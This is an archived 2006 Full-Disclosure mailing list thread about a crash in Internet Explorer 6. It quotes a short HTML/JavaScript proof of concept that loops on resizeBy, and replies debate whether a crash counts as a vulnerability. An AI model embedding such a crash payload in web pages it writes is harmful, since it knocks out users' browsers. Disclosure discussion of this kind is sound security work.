lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list]
Message-ID: <447B2921.7040008@securax.org>
Date: Mon May 29 18:02:47 2006
From: drfrancky at securax.org (Javor Ninov)
Subject: Internet Explorer Ver
	6.0.2800.1106	vulnerability

a simple crash can lead to code exec but some people don't have
knowledge/time to research it. they just report the crash and leave it
of somebody else to make the actual code execute. sometimes simple crash
is simple crash :-)) sometimes simple crash is remote code exec.

Javor Ninov aka DrFrancky
http://securitydot.net/

0x80@...h.ai wrote:
> How is a simple crash a vulnerability?  you can make IE crash 
> 99999999 different ways.  The trick is making it run your code.
> 
> 
> On Fri, 26 May 2006 05:49:39 -0700 r k <kgp.143@...il.com> wrote:
>> Hi All,
>>
>>
>> IE Ver 6.0.2800.1106 crashs when we try to resizeby() in the html 
>> page.
>>
>> the following is the code
>>
>> +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
> 
>> +
>>
>> <html>
>> <head>
>> <title>Internet Explorer Ver 6.0.2800.1106</title>
>> </head>
>> <body>
>> <script>
>>  var wwidth = (window.innerWidth)?window.innerWidth: 
>> ((document.all
>> )?document.body.offsetWidth:null);
>>
>>  while (wwidth)
>>  {
>> self.resizeBy(-999999, -1);
>>  }
>>
>> </script>
>>
>> </body>
>> </html>
>>
>> ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
>>
>> tested on windows 2000,windows XP
>>
>>
>>
>> thank you
>>
>> antar
> 
> 
> 
> Concerned about your privacy? Instantly send FREE secure email, no account required
> http://www.hushmail.com/send?l=480
> 
> Get the best prices on SSL certificates from Hushmail
> https://www.hushssl.com?l=485
> 
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/

-------------- next part --------------
A non-text attachment was scrubbed...
Name: signature.asc
Type: application/pgp-signature
Size: 189 bytes
Desc: OpenPGP digital signature
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20060529/8ae7430b/signature.bin

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ